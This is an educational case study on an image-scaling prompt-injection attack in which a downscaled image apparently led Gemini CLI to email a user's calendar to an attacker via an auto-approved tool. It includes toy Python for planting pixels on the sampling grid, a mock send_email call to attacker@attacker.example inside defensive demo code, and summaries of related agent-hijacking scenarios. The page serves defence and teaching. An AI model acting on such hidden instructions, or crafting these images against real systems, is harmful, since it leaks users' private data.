🔍AI RiskAtlas
Case study

Anamorpher — image-scaling prompt injection against production AI systems

Research demonstration · 21 Aug 2025 · 🗺️ Tool-Using Agent

Trail of Bits showed that an image that looks benign at full resolution can expose a hidden prompt-injection payload once an AI pipeline downscales it. They used the technique against Gemini CLI to silently exfiltrate Google Calendar data through an auto-approved Zapier tool call.

Root cause — why it happened

Many AI systems shrink the pictures you upload before the model looks at them, to save memory. An attacker made a picture that looks like a harmless image at its full size, but when the system shrinks it, faint patterns line up into readable words — instructions for the AI. The person uploading it never sees those words. The AI reads the shrunken picture, treats the hidden words as a command, and acts on them. In the demo the command told a connected email tool to send the user's calendar to a stranger — and because that tool was set to act without asking, it just did it.
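To make the shrinking step concrete, here is a toy Python model of the gap between what a person inspects and what the model receives. It assumes the simplest resampler, nearest-neighbour, which keeps one pixel per block and discards the rest. The helper names, image sizes and pixel values are hypothetical. Real pipelines often use bilinear or bicubic filters, which blend neighbouring pixels and make crafting harder, but the underlying aliasing idea is the same.

```python
# Toy model of the inspected-vs-delivered gap under nearest-neighbour
# downscaling. Images are lists of grayscale rows (0-255); sizes, values and
# the top-left sampling rule are simplifying assumptions.

Image = list[list[int]]


def nearest_downscale(img: Image, factor: int) -> Image:
    """Keep one pixel (the top-left) from every factor x factor block."""
    return [row[::factor] for row in img[::factor]]


def embed_on_sample_grid(cover: Image, hidden: Image, factor: int) -> Image:
    """Overwrite only the pixels that nearest_downscale will keep."""
    out = [row[:] for row in cover]
    for y, hidden_row in enumerate(hidden):
        for x, value in enumerate(hidden_row):
            out[y * factor][x * factor] = value
    return out


def fraction_changed(a: Image, b: Image) -> float:
    """Share of pixels that differ between two same-sized images."""
    total = sum(len(row) for row in a)
    changed = sum(pa != pb for ra, rb in zip(a, b) for pa, pb in zip(ra, rb))
    return changed / total


FACTOR = 4
cover = [[200] * 32 for _ in range(32)]  # flat light-grey "innocent" image
# 8x8 dark/light pattern standing in for rendered payload text.
hidden = [[0 if (x + y) % 2 else 200 for x in range(8)] for y in range(8)]

crafted = embed_on_sample_grid(cover, hidden, FACTOR)
delivered = nearest_downscale(crafted, FACTOR)

print(f"pixels changed at full size: {fraction_changed(cover, crafted):.1%}")
print(f"model-delivered image is exactly the hidden pattern: {delivered == hidden}")
```

Only 32 of 1,024 full-size pixels change (about 3%), yet every pixel the model receives is attacker-chosen. In this toy the scattered dots would still be visible; real payloads are tuned to be far less noticeable.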

Risks this case illustrates

Risks are named using the standard OWASP / MITRE ATLAS / NIST lens.

How it unfolded

[Diagram: zones Untrusted, Agent core, Oversight and The real world. Components: User; Orchestrator / Agent Loop; LLM; Identity & Permissions; Tool Runtime; Human Approval Gate; External APIs; Business Database; Untrusted Content; Audit Logging; Attacker-crafted image; Attacker's inbox / server. Edge types: Instructions, Data, Actions, Control / decision, Feedback / logs.]

Setup (step 1 of 6)

The victim uploads a normal-looking image

The user uploads a picture to their AI assistant — say, asking it to describe or work with the image. At full size it looks completely ordinary; there's nothing visibly wrong with it. The attacker prepared this picture earlier and got it to the victim.

📄 What the user uploads (document)
[image: 2048x2048 PNG — appears as an innocuous chart/photo]
User: "Here's the schedule image — can you check my calendar and summarise it?"

# At full resolution the image carries NO visible text.
# The payload is encoded in high-frequency structure that only
# resolves after the pipeline downscales the image.

Controls & guardrails — what would have stopped it

The simplest fix that breaks this: don't let the assistant send data anywhere (email, web, anyone) without a person clicking 'yes' first, and show that person exactly what is being sent. The image trick still works, but a tricked AI then has no way to quietly ship your data out. Two further measures help: don't silently shrink images, and show the user a preview of the exact image the AI is about to read.
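A minimal Python sketch of that gate, assuming a hypothetical agent runtime in which every tool call passes through a single function. `ToolCall`, `EGRESS_TOOLS`, `gated_execute` and the tool names are illustrative inventions, not Gemini CLI or Zapier APIs. The point it shows: data-moving calls always stop for a human, and the human sees the raw arguments rather than a summary the model wrote.

```python
import json
from dataclasses import dataclass, field
from typing import Callable


@dataclass
class ToolCall:
    name: str
    args: dict = field(default_factory=dict)


# Hypothetical tool names that can move data out of the system.
EGRESS_TOOLS = {"send_email", "http_post", "zapier_action"}


class ApprovalDenied(Exception):
    """Raised when the human declines a gated tool call."""


def gated_execute(
    call: ToolCall,
    run: Callable[[ToolCall], str],
    ask_human: Callable[[str], bool],
) -> str:
    """Run a tool call; egress tools need explicit human approval first.

    The approver sees the raw arguments rather than a model-written summary,
    and there is deliberately no auto-approve (trust=True style) bypass.
    """
    if call.name in EGRESS_TOOLS:
        prompt = (
            f"The assistant wants to call {call.name!r} with:\n"
            f"{json.dumps(call.args, indent=2, sort_keys=True)}\n"
            "Allow? "
        )
        if not ask_human(prompt):
            raise ApprovalDenied(call.name)
    return run(call)


# Demo with stand-in callbacks; a real agent would prompt in its own UI.
executed: list[ToolCall] = []
shown_prompts: list[str] = []


def fake_run(call: ToolCall) -> str:
    executed.append(call)
    return f"{call.name} done"


def deny(prompt: str) -> bool:
    shown_prompts.append(prompt)
    return False


exfil = ToolCall("send_email", {"to": "attacker@attacker.example", "body": "<calendar>"})
try:
    gated_execute(exfil, fake_run, deny)
except ApprovalDenied:
    pass

result = gated_execute(ToolCall("read_calendar"), fake_run, deny)
```

The injected `send_email` call never runs because the human declines it after seeing the attacker's address, while the read-only call proceeds without a prompt. Keeping the gated set small is one way to limit the approval fatigue described below.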

Preventive
  • Human-in-the-loop approval on high-risk actions

    Approval fatigue turns gates into rubber stamps; gates placed after the point of no return do nothing; and approvers can be misled by a model-written summary of the action.

  • Egress allowlisting & DLP on tool arguments

    Allowlists fight an open-ended channel; legitimate-but-broad destinations (any URL fetch, any email) are hard to constrain without breaking usefulness. Encoding can evade naive DLP.

  • Least-privilege identity & scoped credentials

    Doesn't prevent manipulation — only caps its reach. Hard to get right operationally; over-broad scopes are the common real-world failure.

  • MCP/plugin pinning, manifest hashing & re-review

    Review catches what reviewers understand; a subtle malicious directive can pass. Pinning helps only if you actually re-review on update rather than auto-accepting.
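Egress allowlisting on tool arguments can be sketched as a check that runs before any data-moving call executes. This Python version is a minimal illustration under hypothetical assumptions: the allowlists, the regular expressions and `egress_violations` are invented for the example, and matching is exact-host only. As the limitation above warns, encoded or obfuscated destinations would slip past a check this naive.

```python
import re
from urllib.parse import urlsplit

# Hypothetical policy: the only destinations data may be sent to.
ALLOWED_EMAIL_DOMAINS = {"example.com"}
ALLOWED_URL_HOSTS = {"api.example.com"}

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@([A-Za-z0-9.-]+\.[A-Za-z]{2,})")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def iter_strings(value):
    """Yield every string nested anywhere in a tool-argument structure."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for item in value.values():
            yield from iter_strings(item)
    elif isinstance(value, (list, tuple)):
        for item in value:
            yield from iter_strings(item)


def egress_violations(args: dict) -> list[str]:
    """List destinations in the arguments that are not on the allowlist.

    Exact-match only; obfuscated or encoded destinations will slip past.
    """
    problems = []
    for text in iter_strings(args):
        for match in EMAIL_RE.finditer(text):
            if match.group(1).lower() not in ALLOWED_EMAIL_DOMAINS:
                problems.append(f"recipient not allowed: {match.group(0)}")
        for url in URL_RE.findall(text):
            host = (urlsplit(url).hostname or "").lower()
            if host not in ALLOWED_URL_HOSTS:
                problems.append(f"URL host not allowed: {host}")
    return problems


blocked = egress_violations(
    {"to": "attacker@attacker.example", "body": "Calendar at https://attacker.example/c"}
)
allowed = egress_violations({"to": "alice@example.com", "body": "See https://api.example.com/v1"})
```

Scanning every nested string, not just a `to` field, catches destinations smuggled into a message body; a non-empty result would block the call or escalate it to a human.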

Detective
Corrective
  • Loop/cost circuit-breakers & consistency checks

    Thresholds are blunt — too tight breaks legitimate long tasks, too loose lets damage accrue first. Catches runaway dynamics, not a single well-formed bad decision.

  • Governance: risk assessment, red-teaming & incident response

    Process reduces likelihood and speeds recovery but executes no technical control itself; weak follow-through makes it theatre.
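A loop/cost circuit-breaker can be as small as a per-task counter. The Python sketch below assumes a hypothetical runtime that reports each tool call's cost; `CircuitBreaker`, `CircuitOpen` and the limits are illustrative. It also makes the stated limitation concrete: a single well-formed exfiltration call, as in this case, stays far under any sensible budget, so this complements rather than replaces the approval gate.

```python
from dataclasses import dataclass


class CircuitOpen(Exception):
    """Raised when a task exceeds its call or cost budget."""


@dataclass
class CircuitBreaker:
    max_calls: int = 20      # hypothetical per-task limits; tune per workload
    max_cost: float = 1.0    # e.g. currency units of model + tool spend
    calls: int = 0
    cost: float = 0.0

    def record(self, cost: float) -> None:
        """Account for one tool call and trip once either budget is exceeded."""
        self.calls += 1
        self.cost += cost
        if self.calls > self.max_calls or self.cost > self.max_cost:
            raise CircuitOpen(
                f"stopped after {self.calls} calls (cost {self.cost:.2f})"
            )


# Demo: a runaway loop is stopped on the first call past the limit.
breaker = CircuitBreaker(max_calls=3, max_cost=10.0)
tripped_at = None
for step in range(1, 6):
    try:
        breaker.record(cost=0.5)
    except CircuitOpen:
        tripped_at = step
        break
```

Here the fourth call trips the breaker; a lone malicious call on a fresh task would pass straight through.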

Lessons

  • Prompt injection is multimodal: a payload can ride in pixels that only become legible after the pipeline downscales the image, leaving nothing in the text channel (no hidden characters or Unicode tricks) for text-based filters to catch.
  • Silent, lossy preprocessing creates an inspected-vs-delivered gap: the operator reviews the full-resolution upload while the model sees a different, downscaled image. Show the user the image the model actually gets.
  • Auto-approving tool calls (trust=True) removes the only enforcement between a manipulated model and a real-world action — the durable control is a human gate on sensitive/irreversible calls, not a better input filter.
  • Detecting the crafted image is hard by design; defend at the action and egress boundaries (confirmation + allowlisting + least privilege) so a successful injection still has no path to exfiltrate.

Proposals & gaps this case surfaced

Non-destructive suggestions for the library — proposed, not adopted.

✚ Proposed guardrail: Multimodal input-fidelity check (show/verify the model-delivered, post-downscale image and avoid silent lossy resampling) · Input Sanitisation & Validation

Before inference, render a preview of the exact image (and dimensions) the model will receive after preprocessing, and either avoid silent downscaling or constrain ingest dimensions — so an attacker cannot hide a payload that only becomes legible after resampling. Closes the inspected-vs-delivered gap that text-based injection filters miss.
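One way to approximate this proposal, sketched in Python under stated assumptions: compute the image the model will actually receive, return it so the interface can show it as the preview, and flag uploads whose delivered version diverges sharply from an anti-aliased (block-average) downscale of the same file. The divergence heuristic is an added illustration, not part of the proposal itself. The nearest-neighbour pipeline, function names and threshold are all hypothetical.

```python
# Sketch of an input-fidelity check. Assumptions: grayscale images as lists of
# rows, a pipeline that downscales with nearest-neighbour, and a block-average
# downscale as the anti-aliased reference view of the upload.

Image = list[list[int]]


def nearest_downscale(img: Image, factor: int) -> Image:
    """What the hypothetical pipeline delivers: one pixel per block."""
    return [row[::factor] for row in img[::factor]]


def box_downscale(img: Image, factor: int) -> Image:
    """Reference view: average every factor x factor block."""
    out = []
    for by in range(len(img) // factor):
        row = []
        for bx in range(len(img[0]) // factor):
            block = [
                img[by * factor + dy][bx * factor + dx]
                for dy in range(factor)
                for dx in range(factor)
            ]
            row.append(sum(block) // len(block))
        out.append(row)
    return out


def mean_abs_diff(a: Image, b: Image) -> float:
    n = sum(len(row) for row in a)
    return sum(abs(x - y) for ra, rb in zip(a, b) for x, y in zip(ra, rb)) / n


def fidelity_check(img: Image, factor: int, threshold: float = 20.0):
    """Return (ok, delivered); show `delivered` to the user as the preview.

    ok is False when the delivered image departs sharply from an anti-aliased
    view of the same upload, a sign that content may only exist after resampling.
    The threshold is a hypothetical starting point, not a tuned value.
    """
    if factor == 1:
        return True, img  # no resampling, so no resampling-only payload
    delivered = nearest_downscale(img, factor)
    score = mean_abs_diff(delivered, box_downscale(img, factor))
    return score <= threshold, delivered


# Demo: a flat image passes; one with a pattern planted on the sample grid fails.
flat = [[200] * 32 for _ in range(32)]
planted = [row[:] for row in flat]
for y in range(8):
    for x in range(8):
        if (x + y) % 2:
            planted[y * 4][x * 4] = 0

flat_ok, _ = fidelity_check(flat, 4)
planted_ok, planted_preview = fidelity_check(planted, 4)
```

Natural images with fine texture can also score high, so expect false positives, and an attacker who knows the check could tune a payload against it. Consistent with the lesson that detection is hard by design, the returned preview and the action-side controls still carry most of the weight.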

This case shows a gap: we usually picture 'hidden instructions' as invisible text, but here they're hidden in an image and only appear after the system shrinks it. There's no guardrail that says 'check that the picture the AI actually sees matches the one the person uploaded' — that divergence is its own risk worth naming.

These surface as proposals across the Control Library and Risk Taxonomy; adopt them by hand when ready.

Practise the risk class — related scenarios

🔑The Agent With the Master Key

An ops agent gets one god-mode credential — and one misread wipes production

📧The Email That Gave Orders

A support email hides instructions — and the assistant obeys them

🗄️When the Query Bites Back

A text-to-SQL agent runs the model's output straight at the database

🕵️Lies in the Loop

A poisoned issue makes the agent lie to the human who approves its actions

👂Overheard Through the Cache

A speed optimisation becomes a cross-tenant listening device

🪟Stealing the Model

Two doors to the same secret: reconstruct the model through its API, or just walk off with the weight file

🪤The Bug Report That Ran Code

A fake Sentry error report hijacks a developer's coding agent into running a shell command

📼The Compromised Flight Recorder

The forensic record is itself the attack surface — an agent's log is poisoned, then quietly rewritten

👁️The Invisible Webpage Command

A shopping page tells the agent to do something the user never asked for

🧠The Memory That Wouldn't Die

A single poisoned document plants a standing instruction that survives every reset

🖼️The Picture That Whispered

A screenshot that's harmless at full size becomes an order once the system shrinks it

🎫The Stolen Session

An attacker captures the agent's bearer token — and inherits its authority

🥸The Uninvited Agent

A forged peer registers on the agent directory — and the planner enlists it

🛡️The Watcher Watched

The eval gate that was supposed to catch the agent is itself the thing being attacked

🪪The Worker Who Spoke for the Boss

A poisoned web page hijacks a research agent — and the planner acts on its behalf

🖼️Zero-Click Leak by Picture

An inbox summary quietly ships a secret to an attacker's server

AI RiskAtlas is an educational model of how GenAI & agentic systems work and fail. Architectures and payloads are illustrative and simplified for learning — not operational guidance. Real-world cases are summarised from public reporting.

Sources & further reading · Built by Shi Yuan